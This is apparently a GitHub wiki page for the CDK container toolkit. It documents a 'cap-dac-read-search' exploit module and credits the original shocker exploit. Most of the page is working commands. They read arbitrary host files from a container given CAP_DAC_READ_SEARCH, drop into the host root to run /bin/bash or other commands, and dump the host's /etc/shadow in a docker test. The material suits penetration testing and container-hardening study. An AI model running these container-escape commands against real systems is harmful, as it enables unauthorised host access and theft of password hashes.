-
Notifications
You must be signed in to change notification settings - Fork 554
Exploit: cap dac read search
neargle edited this page Sep 5, 2021
·
4 revisions
Thanks @nikitastupin.
If container is run with CAP_DAC_READ_SEARCH
capability it is able to read arbitrary file from host system. This is possible because CAP_DAC_READ_SEARCH
gives ability to bypass DAC (discretionary access control) checks and open files by file handles which are global file identifiers. Original exploit can be found at http://stealth.openwall.net/xSports/shocker.c.
# read file from host
./cdk run cap-dac-read-search <target>
# specify bind mount point file path and read file
./cdk run cap-dac-read-search /etc/hosts /tmp/pwn
# when target file is /, this exploit will chdir to host root and execute a command(default: /bin/bash)
./cdk run cap-dac-read-search /etc/hosts /
# also you can specify what command to be executed, but cdk will recognize the string starting with'-' as its own option, so only some simple commands can be used
./cdk run cap-dac-read-search /etc/hosts / cat /tmp/pwn
- Build
cdk
- Run a docker container
docker run -it --rm --cap-add CAP_DAC_READ_SEARCH -v "$(pwd)/cdk":/cdk ubuntu /bin/bash
1. Runcdk
exploit inside the containercdk run cap-dac-read-search /etc/shadow /etc/hosts
You should get /etc/shadow
from host:
Verify that /etc/shadow
from container is different: